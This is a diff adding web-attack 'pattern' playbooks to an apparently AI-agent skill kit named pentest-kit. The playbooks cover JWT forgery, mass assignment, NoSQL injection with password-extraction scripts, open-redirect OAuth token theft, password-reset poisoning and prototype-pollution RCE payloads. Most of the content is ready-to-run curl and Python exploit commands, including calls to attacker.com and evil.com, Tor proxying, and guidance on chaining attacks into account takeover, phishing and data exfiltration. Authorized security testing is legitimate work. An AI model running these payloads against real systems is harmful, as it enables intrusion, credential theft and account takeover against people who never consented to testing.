+def b64(d): return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b'=').decode()
+print(b64(header) + '.' + b64(payload) + '.')
+\""
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/protected' -H 'Authorization: Bearer <none-jwt>' -o /tmp/jwt-none.txt && cat /tmp/jwt-none.txt"
+```
+
+### Step 3: Test algorithm confusion (RS256 to HS256)
+
+If the server uses RS256, try switching to HS256 and signing with the public key.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/.well-known/jwks.json' -o /tmp/jwks.json && cat /tmp/jwks.json | python3 -m json.tool"
+```
+
+```bash
+pentest-kit exec bash -c "python3 -c \"
+import json, base64, hmac, hashlib
+# Extract public key from JWKS and convert to PEM, then use as HMAC secret
+with open('/tmp/jwks.json') as f: jwks = json.load(f)
+print('Keys found:', len(jwks.get('keys', [])))
+for k in jwks.get('keys', []): print('kid:', k.get('kid'), 'kty:', k.get('kty'), 'alg:', k.get('alg'))
+\""
+```
+
+```bash
+pentest-kit exec bash -c "jwt_tool '<original-jwt>' -X k -pk /tmp/public.pem -I -pc role -pv admin 2>&1 | tail -20"
+```
+
+### Step 4: Test kid (Key ID) injection
+
+If the header contains `kid`, test for path traversal or SQL injection in the kid value.
+
+```bash
+pentest-kit exec bash -c "python3 -c \"
+import base64, json, hmac, hashlib
+header = {'alg': 'HS256', 'typ': 'JWT', 'kid': '/dev/null'}
+payload = {'sub': 'admin', 'role': 'admin', 'iat': 1700000000, 'exp': 1900000000}
+def b64(d): return base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b'=').decode()
+h = b64(header); p = b64(payload)
+sig = base64.urlsafe_b64encode(hmac.new(b'', (h+'.'+p).encode(), hashlib.sha256).digest()).rstrip(b'=').decode()
+print(h + '.' + p + '.' + sig)
+\""
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/protected' -H 'Authorization: Bearer <kid-injected-jwt>' -o /tmp/jwt-kid.txt && cat /tmp/jwt-kid.txt"
+```
+
+Test SQL injection in kid:
+
+```bash
+pentest-kit exec bash -c "jwt_tool '<original-jwt>' -X i -I -hc kid -hv \"' UNION SELECT 'ATTACKER_KEY' -- \" -pc role -pv admin 2>&1 | tail -20"
+```
+
+### Step 5: Test JWK header injection
+
+Embed an attacker-controlled JWK in the token header.
+
+```bash
+pentest-kit exec bash -c "jwt_tool '<original-jwt>' -X s -I -pc sub -pv admin 2>&1 | tail -20"
+```
+
+### Step 6: Test jku (JWK Set URL) spoofing
+
+Point the jku header to an attacker-controlled JWKS endpoint.
+
+```bash
+pentest-kit exec bash -c "jwt_tool '<original-jwt>' -X u -ju 'https://attacker.com/.well-known/jwks.json' -I -pc role -pv admin 2>&1 | tail -20"
+```
+
+### Step 7: Brute-force weak HMAC secrets
+
+```bash
+pentest-kit exec bash -c "jwt_tool '<original-jwt>' -C -d /usr/share/wordlists/rockyou.txt 2>&1 | tail -30"
+```
+
+If a secret is found, forge a new token:
+
+```bash
+pentest-kit exec bash -c "jwt_tool '<original-jwt>' -S hs256 -p '<cracked-secret>' -I -pc role -pv admin 2>&1 | tail -10"
+```
+
+### Step 8: Test expired token acceptance
+
+Send a token with an old `exp` claim to check if expiry is enforced.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/protected' -H 'Authorization: Bearer <expired-jwt>' -o /tmp/jwt-exp.txt && cat /tmp/jwt-exp.txt"
+```
+
+### Step 9: Validate findings with forged admin token
+
+Use the successful bypass method to forge a privileged token and access admin resources.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/admin/users' -H 'Authorization: Bearer <forged-jwt>' -o /tmp/jwt-admin.txt && cat /tmp/jwt-admin.txt"
+```
+
+## Common pitfalls
+
+- **Base64 padding**: JWT uses base64url without padding. Add `=` padding before decoding if tools fail.
+- **Algorithm none variants**: Try `None`, `NONE`, `nOnE` as some parsers are case-sensitive.
+- **Public key format**: RS256-to-HS256 confusion requires the exact public key bytes the server uses. Try both PEM and DER.
+- **jwt_tool not installed**: Install with `pip3 install jwt_tool` or clone from GitHub.
+- **Clock skew**: Servers may accept tokens a few minutes past expiry. Adjust `exp` accordingly.
+
+## Chain opportunities
+
+- **Privilege escalation**: Forge admin tokens to access admin API endpoints.
+- **Account takeover**: Change `sub` claim to impersonate other users.
+- **SSRF via jku**: If jku is followed server-side, use it to probe internal services.
+- **SQL injection via kid**: If kid is used in a database query, full SQLi exploitation is possible.
+- **Information disclosure**: Decode tokens from other users to learn internal claim structures.

--- a/.claude/skills/pentest-kit/patterns/mass-assignment-testing.md
+++ b/.claude/skills/pentest-kit/patterns/mass-assignment-testing.md
@@ -1,0 +1,120 @@
+# Pattern: Mass Assignment Testing
+
+Identify endpoints that bind user input to internal object properties, inject privileged fields, and verify unauthorized state changes.
+
+## When to use
+
+- Application has user profile update, registration, or settings endpoints
+- API accepts JSON or form data that maps to backend models
+- Suspect the backend uses ORM auto-binding (Rails strong params bypass, Django, Express)
+- Looking for privilege escalation via hidden fields (role, isAdmin, price, balance)
+
+## Step-by-step
+
+### Step 1: Map writable endpoints
+
+Identify endpoints that accept user-modifiable data.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/profile' -H 'Cookie: session=SESSION_TOKEN' -o /tmp/ma-profile.json && cat /tmp/ma-profile.json"
+```
+
+Note all fields returned — some may be writable even if not exposed in the UI.
+
+### Step 2: Identify hidden fields from responses
+
+Look for fields like `role`, `isAdmin`, `is_staff`, `verified`, `balance`, `price`, `permissions`.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/profile' -H 'Cookie: session=SESSION_TOKEN' | python3 -m json.tool 2>/dev/null | grep -iP '(role|admin|staff|verified|balance|price|permission|privilege|tier|plan|credit)'"
+```
+
+### Step 3: Check API documentation or schema
+
+Look for OpenAPI/Swagger docs that reveal model properties.
+
+```bash
+pentest-kit exec bash -c "for path in '/api/docs' '/swagger.json' '/api/v1/openapi.json' '/api-docs'; do code=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET'\$path); echo \"\$path -> \$code\"; done"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/docs' -o /tmp/ma-docs.json && head -50 /tmp/ma-docs.json"
+```
+
+### Step 4: Test role escalation
+
+Send an update with an injected `role` or `isAdmin` field.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/profile' -X PUT -H 'Content-Type: application/json' -H 'Cookie: session=SESSION_TOKEN' -d '{\"name\":\"testuser\",\"role\":\"admin\"}' -o /tmp/ma-role.json && cat /tmp/ma-role.json"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/profile' -X PUT -H 'Content-Type: application/json' -H 'Cookie: session=SESSION_TOKEN' -d '{\"name\":\"testuser\",\"isAdmin\":true}' -o /tmp/ma-admin.json && cat /tmp/ma-admin.json"
+```
+
+### Step 5: Verify privilege change
+
+Re-fetch the profile to confirm the field was accepted.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/profile' -H 'Cookie: session=SESSION_TOKEN' -o /tmp/ma-verify.json && cat /tmp/ma-verify.json"
+```
+
+Try accessing admin-only endpoints:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/admin/users' -H 'Cookie: session=SESSION_TOKEN' -o /tmp/ma-admin-access.json && head -20 /tmp/ma-admin-access.json"
+```
+
+### Step 6: Test price manipulation
+
+On e-commerce targets, try modifying the price field during order creation.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/orders' -X POST -H 'Content-Type: application/json' -H 'Cookie: session=SESSION_TOKEN' -d '{\"productId\":1,\"quantity\":1,\"price\":0.01}' -o /tmp/ma-price.json && cat /tmp/ma-price.json"
+```
+
+### Step 7: Test on registration endpoint
+
+During signup, inject privileged fields.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/register' -X POST -H 'Content-Type: application/json' -d '{\"username\":\"attacker\",\"email\":\"attacker@test.com\",\"password\":\"Test1234!\",\"role\":\"admin\",\"verified\":true}' -o /tmp/ma-register.json && cat /tmp/ma-register.json"
+```
+
+### Step 8: Test with alternative content types
+
+Some frameworks bind differently with form data vs JSON.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/profile' -X PUT -H 'Cookie: session=SESSION_TOKEN' -d 'name=testuser&role=admin&isAdmin=true' -o /tmp/ma-form.json && cat /tmp/ma-form.json"
+```
+
+### Step 9: Test nested object injection
+
+Some ORMs allow setting related model fields via nested objects.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/profile' -X PUT -H 'Content-Type: application/json' -H 'Cookie: session=SESSION_TOKEN' -d '{\"name\":\"testuser\",\"organization\":{\"plan\":\"enterprise\"},\"permissions\":[\"admin\",\"write\",\"delete\"]}' -o /tmp/ma-nested.json && cat /tmp/ma-nested.json"
+```
+
+### Step 10: Automated scan with nuclei
+
+```bash
+pentest-kit exec bash -c "nuclei -u '$TARGET' -tags mass-assignment -jsonl -o /tmp/ma-nuclei.jsonl && cat /tmp/ma-nuclei.jsonl"
+```
+
+## Common pitfalls
+
+- Framework may accept the field silently but not persist it — always verify with a GET
+- Some APIs return 200 OK but ignore unknown fields — check actual state change
+- PATCH vs PUT behavior differs: PATCH may allow partial updates that PUT rejects
+- Rate limiting or WAF may block rapid parameter fuzzing
+
+## Chain opportunities
+
+- Mass assignment + privilege escalation: set admin role, access admin panel
+- Mass assignment + price tampering: buy items for attacker-controlled price
+- Mass assignment + account takeover: set `email` field to attacker email, trigger password reset
+- Mass assignment + verification bypass: set `verified=true` to skip email confirmation

--- a/.claude/skills/pentest-kit/patterns/nosql-operator-catalog.md
+++ b/.claude/skills/pentest-kit/patterns/nosql-operator-catalog.md
@@ -1,0 +1,164 @@
+# Pattern: NoSQL Operator Injection Catalog
+
+## When to use
+
+- Application uses MongoDB, CouchDB, or other NoSQL databases
+- Login forms, search fields, or API endpoints accept JSON or query parameters
+- Goal is to bypass authentication, extract data, or enumerate collections
+
+## Prerequisites
+
+- Identified NoSQL-backed endpoint (login, search, API)
+- Knowledge of backend (MongoDB is most common; check error messages)
+- Proxy running: `pentest-kit proxy tor`
+
+## Step-by-step
+
+### Step 1: Detect NoSQL injection with operator payloads
+
+Test if the application interprets MongoDB operators in user input.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":{\"\\$ne\":\"\"},\"password\":{\"\\$ne\":\"\"}}' -o /tmp/nosql-ne.json && cat /tmp/nosql-ne.json | python3 -m json.tool"
+```
+
+If login succeeds, the endpoint is vulnerable to operator injection.
+
+### Step 2: Authentication bypass with \$gt operator
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":{\"\\$gt\":\"\"},\"password\":{\"\\$gt\":\"\"}}' -o /tmp/nosql-gt.json && cat /tmp/nosql-gt.json | python3 -m json.tool"
+```
+
+### Step 3: Extract usernames with \$regex operator
+
+Enumerate valid usernames character by character.
+
+```bash
+pentest-kit exec bash -c "for C in a b c d e f g h i j k l m n o p q r s t u v w x y z; do RESP=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":{\"\\$regex\":\"^'\$C'\"},\"password\":{\"\\$ne\":\"\"}}'); echo \"\$C -> HTTP \$RESP\"; done"
+```
+
+Build the full username iteratively:
+
+```bash
+pentest-kit exec bash -c "python3 -c \"
+import requests, string
+url = '\$TARGET/api/login'
+known = ''
+for pos in range(20):
+    found = False
+    for c in string.ascii_lowercase + string.digits + '_-.':
+        payload = {'username': {'\\\$regex': '^' + known + c}, 'password': {'\\\$ne': ''}}
+        r = requests.post(url, json=payload, verify=False, timeout=5)
+        if r.status_code == 200 and 'token' in r.text.lower():
+            known += c
+            print(f'Found: {known}')
+            found = True
+            break
+    if not found:
+        break
+print(f'Username: {known}')
+\""
+```
+
+### Step 4: Extract passwords with \$regex
+
+Once a username is known, extract the password the same way.
+
+```bash
+pentest-kit exec bash -c "python3 -c \"
+import requests, string
+url = '\$TARGET/api/login'
+username = 'admin'
+known = ''
+for pos in range(30):
+    found = False
+    for c in string.printable.strip():
+        if c in '.*+?^\\\\[]{}()|/':
+            c_esc = '\\\\\\\\' + c
+        else:
+            c_esc = c
+        payload = {'username': username, 'password': {'\\\$regex': '^' + known + c_esc}}
+        try:
+            r = requests.post(url, json=payload, verify=False, timeout=5)
+            if r.status_code == 200 and 'token' in r.text.lower():
+                known += c
+                print(f'Password so far: {known}')
+                found = True
+                break
+        except: pass
+    if not found:
+        break
+print(f'Password: {known}')
+\""
+```
+
+### Step 5: Test \$where injection (JavaScript execution)
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":\"admin\",\"password\":{\"\\$where\":\"return true\"}}' -o /tmp/nosql-where.json && cat /tmp/nosql-where.json"
+```
+
+Time-based detection:
+
+```bash
+pentest-kit exec bash -c "START=\$(date +%s); curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":{\"\\$where\":\"sleep(5000)||true\"},\"password\":\"x\"}' -o /dev/null; END=\$(date +%s); echo \"Elapsed: \$((END-START))s\""
+```
+
+If elapsed time is 5+ seconds, JavaScript execution is confirmed.
+
+### Step 6: Test \$exists for field enumeration
+
+Discover what fields exist in the collection.
+
+```bash
+pentest-kit exec bash -c "for FIELD in password pass pwd hash token secret apiKey email role admin isAdmin; do RESP=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/api/login' -X POST -H 'Content-Type: application/json' -d '{\"username\":\"admin\",\"\\$and\":[{\"'\$FIELD'\":{\"\\$exists\":true}}],\"password\":{\"\\$ne\":\"\"}}'); echo \"\$FIELD -> HTTP \$RESP\"; done"
+```
+
+### Step 7: URL parameter-based injection (non-JSON)
+
+Some applications pass NoSQL operators via URL query parameters.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/login?username[\\$ne]=&password[\\$ne]=' -o /tmp/nosql-url.json && cat /tmp/nosql-url.json"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/login' -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'username[\\$ne]=&password[\\$ne]=' -o /tmp/nosql-form.json && cat /tmp/nosql-form.json"
+```
+
+### Step 8: CouchDB-specific injection
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/_all_dbs' -o /tmp/couch-dbs.json && cat /tmp/couch-dbs.json | python3 -m json.tool"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/users/_all_docs?include_docs=true' -o /tmp/couch-users.json && cat /tmp/couch-users.json | python3 -m json.tool"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/users/_find' -X POST -H 'Content-Type: application/json' -d '{\"selector\":{\"password\":{\"\\$gt\":\"\"}},\"fields\":[\"_id\",\"username\",\"password\"]}' -o /tmp/couch-find.json && cat /tmp/couch-find.json | python3 -m json.tool"
+```
+
+### Step 9: Automate with NoSQLMap
+
+```bash
+pentest-kit exec bash -c "nosqlmap -u '$TARGET/api/login' --data '{\"username\":\"test\",\"password\":\"test\"}' --attack 2 2>&1 | tail -30"
+```
+
+## Common pitfalls
+
+- **JSON vs form encoding**: MongoDB operator injection works differently in JSON bodies vs URL-encoded forms. Test both.
+- **Escaped dollar signs**: Shells interpret `$`. Always escape as `\$` in bash or use single quotes.
+- **Framework sanitization**: Mongoose (Node.js) sanitizes `$` operators by default since v6. Check if the app uses raw MongoDB driver.
+- **\$where disabled**: MongoDB 4.4+ restricts `$where` by default. Operator injection still works.
+- **Rate limiting**: Character-by-character extraction generates many requests. Monitor for blocks.
+
+## Chain opportunities
+
+- **Authentication bypass to admin**: Use `$ne` bypass to login as first user in collection (often admin).
+- **Data exfiltration**: Extract all documents from collections using `$regex` and `$exists`.
+- **RCE via \$where**: If `$where` accepts JavaScript, attempt server-side code execution.
+- **Credential reuse**: Extracted passwords may work on other services.
+- **Combine with IDOR**: After authentication bypass, enumerate other user resources.

--- a/.claude/skills/pentest-kit/patterns/open-redirect-chains.md
+++ b/.claude/skills/pentest-kit/patterns/open-redirect-chains.md
@@ -1,0 +1,122 @@
+# Pattern: Open Redirect Detection and Exploitation Chains
+
+Find redirect parameters, bypass common filters, and chain open redirects with OAuth token theft and phishing.
+
+## When to use
+
+- Application has login redirects, logout redirects, or return-URL parameters
+- Parameters named `url`, `redirect`, `next`, `return`, `continue`, `dest` are present
+- Need to chain an open redirect with OAuth or SSO for token theft
+- Phishing campaign requires a trusted-domain redirect
+
+## Step-by-step
+
+### Step 1: Identify redirect parameters
+
+Search for common redirect parameter names in page source and URLs.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET' -o /tmp/redir-page.html && grep -oiP '(redirect|return|next|continue|dest|url|rurl|forward|goto|target|redir|returnTo|returnUrl|redirect_uri|callback)=' /tmp/redir-page.html | sort -u"
+```
+
+### Step 2: Test basic open redirect
+
+```bash
+pentest-kit exec bash -c "curl -sk -D /tmp/redir-basic-headers.txt -o /dev/null '$TARGET/login?redirect=https://evil.com' && grep -i 'location' /tmp/redir-basic-headers.txt"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk -D /tmp/redir-next-headers.txt -o /dev/null '$TARGET/login?next=https://evil.com' && grep -i 'location' /tmp/redir-next-headers.txt"
+```
+
+If Location header points to evil.com, open redirect confirmed.
+
+### Step 3: Bypass domain validation filters
+
+Try protocol-relative URLs:
+
+```bash
+pentest-kit exec bash -c "curl -sk -D /tmp/redir-proto.txt -o /dev/null '$TARGET/login?redirect=//evil.com' && grep -i 'location' /tmp/redir-proto.txt"
+```
+
+Backslash trick (browser normalizes `\` to `/`):
+
+```bash
+pentest-kit exec bash -c "curl -sk -D /tmp/redir-backslash.txt -o /dev/null '$TARGET/login?redirect=/\\evil.com' && grep -i 'location' /tmp/redir-backslash.txt"
+```
+
+### Step 4: Bypass with subdomain tricks
+
+```bash
+pentest-kit exec bash -c "for payload in 'https://evil.com?@$TARGET' 'https://$TARGET.evil.com' 'https://evil.com#@$TARGET' 'https://$TARGET@evil.com'; do echo \"--- \$payload ---\"; curl -sk -D - -o /dev/null '$TARGET/login?redirect='\$payload 2>&1 | grep -i 'location'; done"
+```
+
+### Step 5: Bypass with encoding tricks
+
+URL-encode, double-encode, and use CRLF injection variants.
+
+```bash
+pentest-kit exec bash -c "curl -sk -D /tmp/redir-enc.txt -o /dev/null '$TARGET/login?redirect=https%3A%2F%2Fevil.com' && grep -i 'location' /tmp/redir-enc.txt"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk -D /tmp/redir-dblenc.txt -o /dev/null '$TARGET/login?redirect=https%253A%252F%252Fevil.com' && grep -i 'location' /tmp/redir-dblenc.txt"
+```
+
+CRLF-based redirect injection:
+
+```bash
+pentest-kit exec bash -c "curl -sk -D /tmp/redir-crlf.txt -o /dev/null '$TARGET/login?redirect=%0d%0aLocation:%20https://evil.com' && grep -i 'location' /tmp/redir-crlf.txt"
+```
+
+### Step 6: Bypass path-based validation
+
+```bash
+pentest-kit exec bash -c "for payload in '/redirect?url=https://evil.com/%2F..$TARGET' '/redirect?url=/$TARGET/../../../evil.com' '/redirect?url=https://evil.com%23.$TARGET'; do echo \"--- \$payload ---\"; curl -sk -D - -o /dev/null '$TARGET'\$payload 2>&1 | grep -i 'location'; done"
+```
+
+### Step 7: Chain with OAuth token theft
+
+If the app uses OAuth, the `redirect_uri` may be vulnerable to open redirect chaining.
+
+```bash
+pentest-kit exec bash -c "curl -sk -D /tmp/redir-oauth.txt -o /dev/null '$TARGET/oauth/authorize?client_id=CLIENT_ID&redirect_uri=https://$TARGET/login?redirect=https://evil.com&response_type=code&scope=openid' && grep -i 'location' /tmp/redir-oauth.txt"
+```
+
+The OAuth server redirects the authorization code to the legitimate app, which then redirects (with the code in the URL) to evil.com via the open redirect.
+
+### Step 8: Test POST-based redirects
+
+Some redirects only work via POST (e.g., login forms).
+
+```bash
+pentest-kit exec bash -c "curl -sk -D /tmp/redir-post.txt -o /dev/null '$TARGET/login' -X POST -d 'username=test&password=test&redirect=https://evil.com' && grep -i 'location' /tmp/redir-post.txt"
+```
+
+### Step 9: Test JavaScript-based redirects
+
+Check if redirect is done client-side via `window.location`.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/login?next=https://evil.com' -o /tmp/redir-js.html && grep -oiP '(window\\.location|document\\.location|location\\.href)\\s*=' /tmp/redir-js.html"
+```
+
+### Step 10: Automated scan with nuclei
+
+```bash
+pentest-kit exec bash -c "nuclei -u '$TARGET' -tags redirect -jsonl -o /tmp/redir-nuclei.jsonl && cat /tmp/redir-nuclei.jsonl"
+```
+
+## Common pitfalls
+
+- Some apps validate the domain but not the path — `/evil.com` may not redirect externally
+- JavaScript-based redirects will not show in curl Location headers — needs browser testing
+- OAuth `redirect_uri` validation is often strict on exact match — try path traversal or subdomain
+- Meta refresh redirects (`<meta http-equiv="refresh">`) are also valid open redirect vectors
+
+## Chain opportunities
+
+- Open redirect + OAuth: steal authorization codes or tokens via redirect_uri manipulation
+- Open redirect + phishing: use trusted domain as lure, redirect to credential harvester
+- Open redirect + SSRF: redirect internal requests to attacker-controlled server
+- Open redirect + XSS: chain with reflected XSS on the redirect target for cookie theft

--- a/.claude/skills/pentest-kit/patterns/password-reset-abuse.md
+++ b/.claude/skills/pentest-kit/patterns/password-reset-abuse.md
@@ -1,0 +1,110 @@
+# Pattern: Password Reset Abuse
+
+Exploit weaknesses in password reset flows: host header poisoning, token leakage, predictable tokens, missing expiry, and rate limit bypass.
+
+## When to use
+
+- Target has a password reset / forgot password feature
+- Testing for account takeover via password reset flow
+- Need to verify token security (randomness, expiry, single-use)
+- Looking for host header injection in email-based flows
+
+## Step-by-step
+
+### Step 1: Map the reset flow
+
+Trigger a legitimate password reset and observe the full flow.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/forgot-password' -X POST -d 'email=test@example.com' -D /tmp/reset-headers.txt -o /tmp/reset-resp.html && cat /tmp/reset-headers.txt"
+```
+
+### Step 2: Test host header poisoning
+
+Inject a controlled domain in the Host header. If the reset email uses the Host value, the token leaks to you.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/forgot-password' -X POST -d 'email=victim@example.com' -H 'Host: COLLABORATOR_DOMAIN' -D /tmp/reset-host.txt -o /tmp/reset-host-resp.html && cat /tmp/reset-host.txt"
+```
+
+Try `X-Forwarded-Host` if `Host` is rejected:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/forgot-password' -X POST -d 'email=victim@example.com' -H 'X-Forwarded-Host: COLLABORATOR_DOMAIN' -o /tmp/reset-xfh.html && cat /tmp/reset-xfh.html"
+```
+
+### Step 3: Test token leakage via Referer header
+
+After clicking the reset link, navigate to an external page. Check if the token leaks in the Referer.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/reset-password?token=SAMPLE_TOKEN' -o /tmp/reset-page.html && grep -oP 'href=\"https?://[^\"]+\"' /tmp/reset-page.html"
+```
+
+If the reset page contains external links, the token may leak when the user clicks them.
+
+### Step 4: Test predictable tokens
+
+Collect multiple reset tokens and analyze for patterns.
+
+```bash
+pentest-kit exec bash -c "for i in \$(seq 1 5); do curl -sk '$TARGET/forgot-password' -X POST -d 'email=test@example.com' -o /dev/null; sleep 1; done && echo 'Check email for 5 tokens — compare for sequential patterns, timestamps, or short length'"
+```
+
+If tokens are accessible via API response:
+
+```bash
+pentest-kit exec bash -c "for i in \$(seq 1 5); do curl -sk '$TARGET/forgot-password' -X POST -d 'email=test@example.com' -o /tmp/reset-token-\$i.json; done && cat /tmp/reset-token-*.json"
+```
+
+### Step 5: Test token expiry
+
+Use an old token (generated minutes/hours ago) to verify it still works.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/reset-password' -X POST -d 'token=OLD_TOKEN&password=newpass123&confirm=newpass123' -D /tmp/reset-expiry-headers.txt -o /tmp/reset-expiry.html && cat /tmp/reset-expiry-headers.txt"
+```
+
+If it succeeds, tokens have no expiry — critical finding.
+
+### Step 6: Test token reuse
+
+Use the same valid token twice.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/reset-password' -X POST -d 'token=VALID_TOKEN&password=pass1' -o /tmp/reset-use1.html && curl -sk '$TARGET/reset-password' -X POST -d 'token=VALID_TOKEN&password=pass2' -o /tmp/reset-use2.html && diff /tmp/reset-use1.html /tmp/reset-use2.html"
+```
+
+If both succeed, tokens are not single-use.
+
+### Step 7: Test rate limiting on reset requests
+
+Send many reset requests quickly to check for rate limiting.
+
+```bash
+pentest-kit exec bash -c "for i in \$(seq 1 20); do code=\$(curl -sk -o /dev/null -w '%{http_code}' '$TARGET/forgot-password' -X POST -d 'email=victim@example.com'); echo \"req=\$i status=\$code\"; done"
+```
+
+If no 429 responses appear, there is no rate limiting — enables email bombing.
+
+### Step 8: Test parameter manipulation
+
+Try resetting a different account by changing the email after token generation.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/reset-password' -X POST -d 'token=YOUR_TOKEN&email=victim@example.com&password=hacked123&confirm=hacked123' -o /tmp/reset-swap.html && cat /tmp/reset-swap.html"
+```
+
+## Common pitfalls
+
+- Host header poisoning only works if the app builds reset URLs from the Host header
+- Some apps use a fixed base URL from config — host injection has no effect
+- Token analysis requires access to the email inbox (use your own test account)
+- Rate limiting may be per-IP — test from the same IP the target sees
+
+## Chain opportunities
+
+- Host header poisoning + dangling markup: steal token via CSS injection in email
+- No rate limit + predictable tokens: brute-force short tokens
+- Token in Referer + external resource on reset page: passive token theft
+- Password reset + OAuth: reset password then link attacker OAuth account

--- a/.claude/skills/pentest-kit/patterns/prototype-pollution.md
+++ b/.claude/skills/pentest-kit/patterns/prototype-pollution.md
@@ -1,0 +1,108 @@
+# Pattern: Prototype Pollution Detection and Exploitation
+
+Detect prototype pollution via `__proto__` in JSON input, differentiate server-side (RCE) from client-side (XSS), and build exploitation chains.
+
+## When to use
+
+- Application accepts JSON input (API endpoints, configuration endpoints)
+- JavaScript/Node.js backend suspected (Express, Koa, Fastify)
+- Client-side JavaScript merges or deep-copies user-controlled objects
+- Looking for gadget chains that escalate pollution to RCE or XSS
+
+## Step-by-step
+
+### Step 1: Identify JSON merge endpoints
+
+Find endpoints that accept JSON bodies and merge them into objects.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/update' -X POST -H 'Content-Type: application/json' -d '{\"name\":\"test\"}' -o /tmp/pp-base.json && cat /tmp/pp-base.json"
+```
+
+### Step 2: Test server-side pollution via __proto__
+
+Inject `__proto__` with a canary property and check if it leaks.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/update' -X POST -H 'Content-Type: application/json' -d '{\"__proto__\":{\"polluted\":\"yes\"}}' -o /tmp/pp-test.json && cat /tmp/pp-test.json"
+```
+
+Verify pollution persists by requesting a clean object:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/profile' -o /tmp/pp-verify.json && grep -i 'polluted' /tmp/pp-verify.json"
+```
+
+### Step 3: Test constructor.prototype variant
+
+Some libraries block `__proto__` but not `constructor.prototype`.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/update' -X POST -H 'Content-Type: application/json' -d '{\"constructor\":{\"prototype\":{\"polluted\":\"yes\"}}}' -o /tmp/pp-ctor.json && cat /tmp/pp-ctor.json"
+```
+
+### Step 4: Detect client-side pollution
+
+Fetch JavaScript files and search for vulnerable merge/clone patterns.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET' -o /tmp/pp-page.html && grep -oP 'src=\"[^\"]+\\.js\"' /tmp/pp-page.html"
+```
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/js/app.js' -o /tmp/pp-app.js && grep -n 'merge\\|extend\\|clone\\|assign\\|deepCopy' /tmp/pp-app.js"
+```
+
+Test via URL parameter pollution (common client-side vector):
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/?__proto__[polluted]=yes' -o /tmp/pp-url.html && grep -i 'polluted' /tmp/pp-url.html"
+```
+
+### Step 5: Server-side RCE via status/body gadget (Express/EJS)
+
+Pollute `outputFunctionName` in EJS to achieve RCE.
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/update' -X POST -H 'Content-Type: application/json' -d '{\"__proto__\":{\"outputFunctionName\":\"x;process.mainModule.require(\\\"child_process\\\").execSync(\\\"id\\\");s\"}}' -o /tmp/pp-rce.json && cat /tmp/pp-rce.json"
+```
+
+Then trigger a page that renders an EJS template:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/' -o /tmp/pp-rce-trigger.html && cat /tmp/pp-rce-trigger.html"
+```
+
+### Step 6: Server-side RCE via Pug/Jade gadget
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/api/user/update' -X POST -H 'Content-Type: application/json' -d '{\"__proto__\":{\"block\":{\"type\":\"Text\",\"line\":\"process.mainModule.require(\\\"child_process\\\").execSync(\\\"id\\\")\"}}}' -o /tmp/pp-pug.json && cat /tmp/pp-pug.json"
+```
+
+### Step 7: Client-side XSS via DOM gadget
+
+If `innerHTML` or `srcdoc` reads a polluted property:
+
+```bash
+pentest-kit exec bash -c "curl -sk '$TARGET/?__proto__[srcdoc]=<script>alert(1)</script>' -o /tmp/pp-xss.html && grep -i 'srcdoc\\|alert' /tmp/pp-xss.html"
+```
+
+### Step 8: Scan with nuclei
+
+```bash
